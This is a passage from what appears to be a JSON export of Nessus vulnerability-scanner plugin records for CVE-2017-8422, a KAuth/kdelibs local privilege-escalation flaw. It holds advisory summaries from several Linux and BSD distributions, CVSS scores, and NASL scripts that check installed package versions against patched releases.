reference:\"libkdecore4-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libkdecore4-debuginfo-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libkdecore4-debuginfo-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libksuseinstall1-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libksuseinstall1-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libksuseinstall1-debuginfo-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libksuseinstall1-debuginfo-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kdelibs4-debuginfo-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kdelibs4-debugsource-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkde4-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkde4-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkde4-debuginfo-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkde4-debuginfo-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkdecore4-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkdecore4-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkdecore4-debuginfo-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libkdecore4-debuginfo-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libksuseinstall1-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libksuseinstall1-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libksuseinstall1-debuginfo-32bit-4.12.0-10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"libksuseinstall1-debuginfo-4.12.0-10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kdelibs4\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:08", "description": "Sebastian Krahmer discovered that the KDE-Libs Kauth component incorrectly checked services invoking D-Bus. A local attacker could use this issue to gain root privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-16T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : kde4libs vulnerability (USN-3286-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2019-09-18T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:kdelibs5-plugins", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3286-1.NASL", "href": "https://www.tenable.com/plugins/nessus/100217", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3286-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100217);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-8422\");\n script_xref(name:\"USN\", value:\"3286-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : kde4libs vulnerability (USN-3286-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sebastian Krahmer discovered that the KDE-Libs Kauth component\nincorrectly checked services invoking D-Bus. A local attacker could\nuse this issue to gain root privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3286-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kdelibs5-plugins package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:kdelibs5-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"kdelibs5-plugins\", pkgver:\"4:4.13.3-0ubuntu0.5\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kdelibs5-plugins\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:50", "description": "New kdelibs packages are available for Slackware 13.37, 14.0, 14.1, 14.2, and -current to fix a security issue.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-17T00:00:00", "type": "nessus", "title": "Slackware 13.37 / 14.0 / 14.1 / 14.2 / current : kdelibs (SSA:2017-136-02)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:kdelibs", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2017-136-02.NASL", "href": "https://www.tenable.com/plugins/nessus/100224", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2017-136-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100224);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-8422\");\n script_xref(name:\"SSA\", value:\"2017-136-02\");\n\n script_name(english:\"Slackware 13.37 / 14.0 / 14.1 / 14.2 / current : kdelibs (SSA:2017-136-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New kdelibs packages are available for Slackware 13.37, 14.0, 14.1,\n14.2, and -current to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.474306\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?16e0d7c3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kdelibs package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:kdelibs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.37\", pkgname:\"kdelibs\", pkgver:\"4.5.5\", pkgarch:\"i486\", pkgnum:\"3_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"kdelibs\", pkgver:\"4.5.5\", pkgarch:\"x86_64\", pkgnum:\"3_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"kdelibs\", pkgver:\"4.8.5\", pkgarch:\"i486\", pkgnum:\"2_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"kdelibs\", pkgver:\"4.8.5\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"kdelibs\", pkgver:\"4.10.5\", pkgarch:\"i486\", pkgnum:\"3_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"kdelibs\", pkgver:\"4.10.5\", pkgarch:\"x86_64\", pkgnum:\"3_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"kdelibs\", pkgver:\"4.14.32\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"kdelibs\", pkgver:\"4.14.32\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"kdelibs\", pkgver:\"4.14.32\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"kdelibs\", pkgver:\"4.14.32\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:44", "description": "An update for kdelibs is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe K Desktop Environment (KDE) is a graphical desktop environment for the X Window System. The kdelibs packages include core libraries for the K Desktop Environment.\n\nSecurity Fix(es) :\n\n* A privilege escalation flaw was found in the way kdelibs handled D-Bus messages. A local user could potentially use this flaw to gain root privileges by spoofing a callerID and leveraging a privileged helper application. (CVE-2017-8422)\n\nRed Hat would like to thank Sebastian Krahmer (SUSE) for reporting this issue.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-23T00:00:00", "type": "nessus", "title": "CentOS 7 : kdelibs (CESA-2017:1264)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:kdelibs", "p-cpe:/a:centos:centos:kdelibs-apidocs", "p-cpe:/a:centos:centos:kdelibs-common", "p-cpe:/a:centos:centos:kdelibs-devel", "p-cpe:/a:centos:centos:kdelibs-ktexteditor", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2017-1264.NASL", "href": "https://www.tenable.com/plugins/nessus/100328", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1264 and \n# CentOS Errata and Security Advisory 2017:1264 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100328);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-8422\");\n script_xref(name:\"RHSA\", value:\"2017:1264\");\n\n script_name(english:\"CentOS 7 : kdelibs (CESA-2017:1264)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kdelibs is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe K Desktop Environment (KDE) is a graphical desktop environment for\nthe X Window System. The kdelibs packages include core libraries for\nthe K Desktop Environment.\n\nSecurity Fix(es) :\n\n* A privilege escalation flaw was found in the way kdelibs handled\nD-Bus messages. A local user could potentially use this flaw to gain\nroot privileges by spoofing a callerID and leveraging a privileged\nhelper application. (CVE-2017-8422)\n\nRed Hat would like to thank Sebastian Krahmer (SUSE) for reporting\nthis issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2017-May/022413.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ee863be6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kdelibs packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8422\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kdelibs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kdelibs-apidocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kdelibs-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kdelibs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kdelibs-ktexteditor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kdelibs-4.14.8-6.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kdelibs-apidocs-4.14.8-6.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kdelibs-common-4.14.8-6.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kdelibs-devel-4.14.8-6.el7_3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"kdelibs-ktexteditor-4.14.8-6.el7_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kdelibs / kdelibs-apidocs / kdelibs-common / kdelibs-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:37:09", "description": "Albert Astals Cid reports :\n\nKAuth contains a logic flaw in which the service invoking dbus is not properly checked. This allows spoofing the identity of the caller and with some carefully crafted calls can lead to gaining root from an unprivileged account.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-11T00:00:00", "type": "nessus", "title": "FreeBSD : kauth: Local privilege escalation (0baee383-356c-11e7-b9a9-50e549ebab6c)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:kdelibs", "p-cpe:/a:freebsd:freebsd:kf5-kauth", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_0BAEE383356C11E7B9A950E549EBAB6C.NASL", "href": "https://www.tenable.com/plugins/nessus/100113", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100113);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-8422\");\n\n script_name(english:\"FreeBSD : kauth: Local privilege escalation (0baee383-356c-11e7-b9a9-50e549ebab6c)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Albert Astals Cid reports :\n\nKAuth contains a logic flaw in which the service invoking dbus is not\nproperly checked. This allows spoofing the identity of the caller and\nwith some carefully crafted calls can lead to gaining root from an\nunprivileged account.\"\n );\n # http://www.openwall.com/lists/oss-security/2017/05/10/3\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2017/05/10/3\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kde.org/info/security/advisory-20170510-1.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/0baee383-356c-11e7-b9a9-50e549ebab6c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5d7e1b89\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:kdelibs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:kf5-kauth\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"kdelibs<4.14.30_4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"kf5-kauth<5.33.0_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:50", "description": "security fix for 